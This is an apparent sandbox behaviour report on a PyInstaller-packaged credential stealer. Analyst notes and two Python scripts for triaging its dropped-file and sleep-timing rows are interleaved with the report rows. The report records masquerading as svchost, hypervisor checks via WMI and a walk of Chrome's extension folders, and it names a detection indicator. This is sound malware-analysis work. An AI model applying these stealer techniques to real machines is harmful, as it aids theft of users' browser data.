Source: C:\Users\user\AppData\Local\Temp\main.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67202\_lzma.pyd
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI38562\_ctypes.pyd
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI86682\_ssl.pyd
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI38562\_decimal.pyd
Source: C:\ProgramData\Microsoft\hacn.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI47682\python310.dll
Source: C:\ProgramData\svchost.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\_hashlib.pyd
Source: C:\ProgramData\Microsoft\based.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14722\_sqlite3.pyd
Source: C:\ProgramData\svchost.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-datetime-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\main.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67202\_decimal.pyd
Source: C:\ProgramData\svchost.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\_ctypes.pyd
Source: C:\ProgramData\svchost.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-crt-conio-l1-1-0.dll
Source: C:\ProgramData\svchost.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-crt-convert-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI38562\_queue.pyd
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI86682\_ctypes.pyd
Source: C:\ProgramData\svchost.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-console-l1-1-0.dll
Source: C:\ProgramData\Microsoft\hacn.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI47682\select.pyd
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI53642\python311.dll
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77882\_bz2.pyd
Source: C:\ProgramData\Microsoft\based.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14722\select.pyd
Source: C:\Users\user\AppData\Local\Temp\main.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67202\unicodedata.pyd
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77882\_queue.pyd
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77882\charset_normalizer\md.cp311-win_amd64.pyd
Source: C:\ProgramData\Microsoft\based.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14722\_decimal.pyd
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI38562\_bz2.pyd
Source: C:\ProgramData\svchost.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\_decimal.pyd
Source: C:\ProgramData\Microsoft\based.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14722\_socket.pyd
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI53642\select.pyd
Source: C:\Users\user\AppData\Local\Temp\main.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67202\_bz2.pyd
Source: C:\Users\user\AppData\Local\Temp\main.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67202\select.pyd
Source: C:\ProgramData\svchost.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI11282\_lzma.pyd
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI86682\_lzma.pyd
Source: C:\ProgramData\svchost.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-sysinfo-l1-1-0.dll
Source: C:\ProgramData\svchost.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\_cffi_backend.cp310-win_amd64.pyd
Source: C:\ProgramData\svchost.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\cryptography\hazmat\bindings\_rust.pyd
Source: C:\ProgramData\svchost.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-crt-math-l1-1-0.dll
Source: C:\ProgramData\Microsoft\based.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14722\python311.dll
Source: C:\Users\user\AppData\Local\Temp\main.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67202\_socket.pyd
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI86682\select.pyd
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI53642\_lzma.pyd
                                Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
                                Source: C:\ProgramData\Microsoft\hacn.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI47682\_hashlib.pydJump to dropped file
                                Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI53642\_decimal.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI38562\unicodedata.pydJump to dropped file
                                Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
                                Source: C:\ProgramData\Microsoft\based.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14722\_ssl.pydJump to dropped file
                                Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\_lzma.pydJump to dropped file
                                Source: C:\ProgramData\Microsoft\hacn.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI47682\_socket.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI38562\charset_normalizer\md.cp311-win_amd64.pydJump to dropped file
                                Source: C:\ProgramData\Microsoft\hacn.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI47682\unicodedata.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI11282\unicodedata.pydJump to dropped file
                                Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
                                Source: C:\ProgramData\Microsoft\based.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14722\_lzma.pydJump to dropped file
                                Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-string-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77882\_ssl.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77882\_sqlite3.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI86682\_hashlib.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67202\python311.dllJump to dropped file
                                Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\_ssl.pydJump to dropped file
                                Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
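The dropped-file listing is easier to reason about once each _MEI directory is treated as the unit of analysis: every _MEI<digits> directory is one PyInstaller one-file process instance, and the version-tagged artefacts inside it (python311.dll, *.cp311-*.pyd, *.cp310-*.pyd) tell you which interpreter that payload was frozen with. Read that way, the listing shows that the cstealer.exe, based.exe, main.exe and hacn.exe bundles are CPython 3.11 builds while the C:\ProgramData\svchost.exe bundle (_MEI80762, with _cffi_backend.cp310-win_amd64.pyd and cryptography's _rust.pyd) is a CPython 3.10 build, i.e. at least two separately frozen payloads. The script below is an added example written for this page, not code from the report, the sandbox vendor or the malware author. It parses rows in the report's own flattened "Source: <exe>Dropped PE file which has not been started: <path>" form (a constructed sample of six rows copied from the listing is embedded) and derives that summary; its only inference beyond the rows is that the cpXY tag and the pythonXY.dll name encode the CPython version.

```python
import re
from collections import defaultdict

# Constructed sample: six rows copied from the listing above, with the sandbox's two
# table columns still fused exactly as extraction left them.
SAMPLE_ROWS = r"""
Source: C:\Users\user\AppData\Local\Temp\cstealer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77882\charset_normalizer\md.cp311-win_amd64.pyd
Source: C:\ProgramData\Microsoft\based.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14722\python311.dll
Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\_cffi_backend.cp310-win_amd64.pyd
Source: C:\ProgramData\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\cryptography\hazmat\bindings\_rust.pyd
Source: C:\Users\user\AppData\Local\Temp\cstealer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI38562\_bz2.pyd
Source: C:\Users\user\AppData\Local\Temp\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67202\python311.dll
""".strip()

ROW_RE = re.compile(
    r"^Source: (?P<src>.+?\.exe)"                      # dropping process (column 1)
    r"Dropped PE file which has not been started: "     # fused signature text (column 2)
    r"(?P<dropped>.+)$"
)
# PyInstaller's one-file bootloader extracts into %TEMP%\_MEI<digits>\...
MEI_RE = re.compile(r"\\(_MEI\d+)\\(.+)$")
# Artefacts whose file names carry the CPython version they were built for.
PYVER_RE = re.compile(r"(?:python(\d)(\d+)\.dll|\.cp(\d)(\d+)-win_amd64\.pyd)$", re.IGNORECASE)


def parse_dropped(rows):
    """Return {dropping exe: {_MEI dir: [path relative to the _MEI dir, ...]}}."""
    bundles = defaultdict(lambda: defaultdict(list))
    for line in rows.splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            continue
        mei = MEI_RE.search(m["dropped"])
        if mei:  # drops outside a _MEI directory are not part of this view
            bundles[m["src"]][mei.group(1)].append(mei.group(2))
    return {src: dict(dirs) for src, dirs in bundles.items()}


def python_versions(bundles):
    """Map each _MEI dir to the CPython version its version-tagged files imply, or None."""
    versions = {}
    for dirs in bundles.values():
        for mei, files in dirs.items():
            versions[mei] = None
            for name in files:
                m = PYVER_RE.search(name)
                if m:
                    major, minor = [g for g in m.groups() if g is not None]
                    versions[mei] = f"{major}.{minor}"
                    break
    return versions


def summarize(rows):
    """One line per (dropping exe, _MEI dir): file count and inferred interpreter version."""
    bundles = parse_dropped(rows)
    versions = python_versions(bundles)
    return [
        f"{src} -> {mei}: {len(files)} file(s), CPython {versions[mei] or 'unknown'}"
        for src in sorted(bundles)
        for mei, files in sorted(bundles[src].items())
    ]


if __name__ == "__main__":
    print("\n".join(summarize(SAMPLE_ROWS)))
```

Pointing the script at the full listing rather than the sample gives one line per extraction directory; a _MEI directory with no version-tagged file (as _MEI38562 in the sample) is reported as unknown rather than guessed.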
                                Source: C:\Users\user\AppData\Local\Temp\main.exe | Check user administrative privileges: GetTokenInformation (graph_4-17454)
                                Source: C:\Windows\System32\cmd.exe | API coverage: 7.1 %
                                Source: C:\Users\user\AppData\Local\Temp\main.exe | API coverage: 2.2 %
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | API coverage: 2.7 %
                                Source: C:\Users\user\Desktop\DevxExecutor.exe TID: 616 | Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Windows\System32\cmd.exe TID: 8100 | Thread sleep count: 10000 > 30
                                Source: C:\Windows\System32\cmd.exe TID: 8100 | Thread sleep time: -10000000s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe TID: 9088 | Thread sleep count: 10000 > 30
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe TID: 9088 | Thread sleep time: -10000000s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe TID: 8060 | Thread sleep count: 9998 > 30
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe TID: 8060 | Thread sleep time: -9998000s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7340 | Thread sleep count: 3795 > 30
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7824 | Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7616 | Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7352 | Thread sleep count: 4346 > 30
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7812 | Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7332 | Thread sleep count: 91 > 30
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7600 | Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7444 | Thread sleep count: 3903 > 30
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7428 | Thread sleep count: 121 > 30
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7804 | Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7636 | Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Windows\System32\cmd.exe TID: 8152 | Thread sleep count: 9553 > 30
                                Source: C:\Windows\System32\cmd.exe TID: 8152 | Thread sleep time: -9553000s >= -30000s
                                Source: C:\Windows\System32\cmd.exe TID: 8152 | Thread sleep count: 445 > 30
                                Source: C:\Windows\System32\cmd.exe TID: 8152 | Thread sleep time: -445000s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe TID: 6584 | Thread sleep count: 9998 > 30
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe TID: 6584 | Thread sleep time: -9998000s >= -30000s
                                Source: C:\ProgramData\main.exe TID: 8436 | Thread sleep time (33 waits, each >= -30000s): -5534023222112862s, then -600000s, -599812s, -599656s, -599433s, -599323s, -599094s, -598930s, -598806s, -598693s, -598544s, -598437s, -598317s, -598187s, -598035s, -597906s, -597716s, -597569s, -597453s, -597310s, -597109s, -596890s, -596680s, -596493s, -596344s, -596203s, -596056s, -595927s, -595778s, -595604s, -595216s, -595061s, -594937s
                                Source: C:\ProgramData\main.exe TID: 8476 | Thread sleep count: 2320 > 30
                                Source: C:\ProgramData\main.exe TID: 8188 | Thread sleep time: -30000s >= -30000s
                                Source: C:\ProgramData\main.exe TID: 8084 | Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe TID: 3168 | Thread sleep count: 9998 > 30
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe TID: 3168 | Thread sleep time: -9998000s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8144 | Thread sleep count: 941 > 30
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2448 | Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8104 | Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\ProgramData\svchost.exe TID: 8156 | Thread sleep count: 9998 > 30
                                Source: C:\ProgramData\svchost.exe TID: 8156 | Thread sleep time: -9998000s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6008 | Thread sleep count: 8785 > 30
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8524 | Thread sleep time: -2767011611056431s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6472 | Thread sleep count: 412 > 30
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8356 | Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exe TID: 8432 | Thread sleep count: 9616 > 30
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exe TID: 8432 | Thread sleep time: -9616000s >= -30000s
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exe TID: 8432 | Thread sleep count: 381 > 30
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exe TID: 8432 | Thread sleep time: -381000s >= -30000s
                                Source: C:\Windows\System32\cmd.exe TID: 6120 | Thread sleep count: 9999 > 30
                                Source: C:\Windows\System32\cmd.exe TID: 6120 | Thread sleep time: -9999000s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe TID: 8348 | Thread sleep count: 9999 > 30
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe TID: 8348 | Thread sleep time: -9999000s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8896 | Thread sleep count: 2956 > 30
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9100 | Thread sleep time: -6456360425798339s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8884 | Thread sleep count: 231 > 30
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9000 | Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\ProgramData\svchost.exe TID: 7556 | Thread sleep count: 9991 > 30
                                Source: C:\ProgramData\svchost.exe TID: 7556 | Thread sleep time: -9991000s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe TID: 8520 | Thread sleep count: 8787 > 30
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe TID: 8520 | Thread sleep time: -8787000s >= -30000s
                                Source: C:\Windows\System32\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                                Source: C:\ProgramData\main.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                                Source: C:\Windows\System32\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor (reported twice)
                                Note: systeminfo.exe enumerates Win32_BIOS and Win32_Processor as part of its normal output, so those rows are a side effect of the spawned systeminfo.exe rather than a dedicated check. The query issued by main.exe itself, Select * from Win32_ComputerSystem, returns Manufacturer and Model, which is the pair hypervisor checks compare against vendor strings.
                                Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed (reported 23 times)
                                Source: C:\Windows\System32\cmd.exe | Last function: Thread delayed (reported 9 times)
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Last function: Thread delayed (reported 2 times)
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Code function: 3_2_00000271DC67DCE0 FindFirstFileExW
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Code function: 3_2_00007FF6957E8D00 FindFirstFileExW,FindClose
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Code function: 3_2_00007FF6958026C4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Code function: 3_2_00007FF6957F8670 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError (reported twice)
                                Source: C:\Users\user\AppData\Local\Temp\main.exe | Code function: 4_2_00007FF6D6EA8670 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError (reported twice)
                                Source: C:\Users\user\AppData\Local\Temp\main.exe | Code function: 4_2_00007FF6D6E98D00 FindFirstFileExW,FindClose
                                Source: C:\Users\user\AppData\Local\Temp\main.exe | Code function: 4_2_00007FF6D6EB26C4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose
                                Source: C:\Windows\System32\cmd.exe | Code function: 5_2_00000230D921DCE0 FindFirstFileExW
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Code function: 7_2_0000014E7128DCE0 FindFirstFileExW
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Code function: 9_2_00007FF8A8033229 _errno,malloc,_errno,memset,MultiByteToWideChar,GetLastError,MultiByteToWideChar,MultiByteToWideChar,free,_errno,FindFirstFileW,_errno,FindNextFileW,WideCharToMultiByte
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Code function: 3_2_00007FF8A48FF8D0 GetSystemInfo
                                Note: the three cstealer.exe routines ending in ...8D00, ...26C4 and ...8670 recur in main.exe at the same low address bits under a different image base, so both executables carry the same bootloader image; the _invalid_parameter_noinfo / FindFirstFileExW / FindNextFileW shape is the MSVC CRT's directory-enumeration helper, i.e. bootloader housekeeping rather than the stealer's own file search. The one enumeration routine outside that image, 9_2_00007FF8A8033229, lies in a loaded module (DLL address range), not in the executable.
                                Source: C:\Users\user\Desktop\DevxExecutor.exe | Thread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 (reported 12 times)
                                Source: C:\ProgramData\main.exe | Thread delayed: delay time: 922337203685477 (reported 2 times)
                                Source: C:\ProgramData\main.exe | Thread delayed: delay time (32 waits): 600000, 599812, 599656, 599433, 599323, 599094, 598930, 598806, 598693, 598544, 598437, 598317, 598187, 598035, 597906, 597716, 597569, 597453, 597310, 597109, 596890, 596680, 596493, 596344, 596203, 596056, 595927, 595778, 595604, 595216, 595061, 594937
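The sleep figures in the "Thread sleep time" rows and in the "Thread delayed" rows above say more than the flat ">= 30000" threshold suggests, once two things are known. First, 922337203685477 is 2^63 divided by 10^4, that is the 0x8000000000000000 relative interval (in 100 ns ticks) that Sleep(INFINITE) passes to NtDelayExecution; the larger totals 2767011611056431, 5534023222112862 and 6456360425798339 are exact multiples of it (3x, 6x, 7x), so they are several infinite waits summed per thread, which is a thread blocking on something and not a stall-for-time evasion delay. Second, the remaining figures are only plausible if read as milliseconds despite the "s" suffix (the 10000-iteration loops totalling 10000000 are 1 s sleeps; 600000 is ten minutes); that reading of the sandbox's units is an interpretation made here, not something the report states. Under it, the descending 600000, 599812, 599656, ... sequence on main.exe TID 8436 shrinks with each call, which is the shape of a wait-until-deadline loop that re-waits for the remaining time after every wake, not of a fixed evasion sleep. The script below is an added example, not part of the report, that applies these readings to rows in the report's flattened form (a constructed sample copied from the rows above is embedded) and labels each thread accordingly.

```python
import re
from collections import defaultdict

# 2**63 // 10**4: the relative interval Sleep(INFINITE) hands to NtDelayExecution
# (0x8000000000000000 in 100 ns ticks), as the sandbox prints it.
INFINITE_UNITS = 922337203685477
LONG_SLEEP_MS = 30000  # the report's own threshold
# Assumption made here: the sandbox's figures are milliseconds despite the "s" suffix.

# Constructed sample: rows copied from the report, columns still fused as extracted.
SAMPLE = r"""
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe TID: 9088Thread sleep count: 10000 > 30
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe TID: 9088Thread sleep time: -10000000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8524Thread sleep time: -2767011611056431s >= -30000s
Source: C:\ProgramData\main.exe TID: 8436Thread sleep time: -5534023222112862s >= -30000s
Source: C:\ProgramData\main.exe TID: 8436Thread sleep time: -600000s >= -30000s
Source: C:\ProgramData\main.exe TID: 8436Thread sleep time: -599812s >= -30000s
Source: C:\ProgramData\main.exe TID: 8436Thread sleep time: -599656s >= -30000s
Source: C:\ProgramData\main.exe TID: 8188Thread sleep time: -30000s >= -30000s
""".strip()

ROW_RE = re.compile(
    r"^Source: (?P<src>.+?) TID: (?P<tid>\d+)"              # process and thread (column 1)
    r"Thread sleep (?P<kind>count|time): -?(?P<value>\d+)"  # fused signature text (column 2)
)


def decode_sleep(total):
    """Split a per-thread sleep total into (number of INFINITE waits, finite remainder in ms)."""
    return divmod(total, INFINITE_UNITS)


def parse_sleeps(rows):
    """Collect, per (process, TID), the reported sleep counts and the ordered sleep totals."""
    threads = defaultdict(lambda: {"counts": [], "times": []})
    for line in rows.splitlines():
        m = ROW_RE.match(line.strip())
        if m:
            threads[(m["src"], int(m["tid"]))][m["kind"] + "s"].append(int(m["value"]))
    return dict(threads)


def classify_thread(info):
    """Reduce one thread's figures to what a triager can conclude from the numbers alone."""
    infinite = 0
    finite = []
    for total in info["times"]:
        n_inf, rest_ms = decode_sleep(total)
        infinite += n_inf
        if rest_ms:
            finite.append(rest_ms)
    # A count row paired with a finite total gives the average interval of the loop.
    per_sleep_ms = finite[0] / info["counts"][0] if info["counts"] and finite else None
    # Strictly decreasing totals are the signature of a wait-until-deadline loop.
    countdown = len(finite) >= 3 and all(a > b for a, b in zip(finite, finite[1:]))
    if infinite and not finite:
        verdict = "blocking wait (Sleep(INFINITE)), not a timing delay"
    elif countdown:
        verdict = "deadline wait loop, remaining time re-waited after each wake"
    elif per_sleep_ms is not None and per_sleep_ms <= 1000:
        verdict = "loop of short sleeps (%.0f ms each)" % per_sleep_ms
    elif finite and max(finite) >= LONG_SLEEP_MS:
        verdict = "long sleep total (%d ms)" % max(finite)
    else:
        verdict = "short sleeps only"
    return {"infinite": infinite, "finite_ms": finite, "per_sleep_ms": per_sleep_ms,
            "countdown": countdown, "verdict": verdict}


def triage(rows):
    """Classify every thread that appears in the given report rows."""
    return {key: classify_thread(info) for key, info in parse_sleeps(rows).items()}


if __name__ == "__main__":
    for (src, tid), result in triage(SAMPLE).items():
        print(f"{src} TID {tid}: {result['verdict']}")
```

Run against the full set of rows, the only threads left without a benign reading are the 1 s sleep loops of roughly 10000 iterations in cstealer.exe, svchost.exe, cmd.exe and WmiPrvSE.exe; those are the rows worth correlating with the process tree, not the INFINITE waits that dominate the powershell.exe entries.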
                                Source: C:\ProgramData\Microsoft\based.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0
                                Source: C:\ProgramData\Microsoft\based.exe | File opened: ...\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales
                                Source: C:\ProgramData\Microsoft\based.exe | File opened: ...\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg
                                Source: C:\ProgramData\Microsoft\based.exe | File opened: ...\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images
                                Source: C:\ProgramData\Microsoft\based.exe | File opened: ...\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html
                                Source: C:\ProgramData\Microsoft\based.exe | File opened: ...\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css
                                Note: based.exe opens the extension's version directory and every subdirectory beneath it, i.e. it walks the Chrome profile's Extensions tree rather than reading one known file; a non-browser process under C:\ProgramData touching Chrome's Extensions directory is the indicator to alert on.
                                Source: cstealer.exe, 00000002.00000003.2162717973.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000007.00000003.2189478645.0000014E6F9D3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: j2aTPs+9xYa9+bG3tD60B8jzljHz7aRP+KNOjSkVWLjVb3/ubCK1sK9IRQq9qEmU
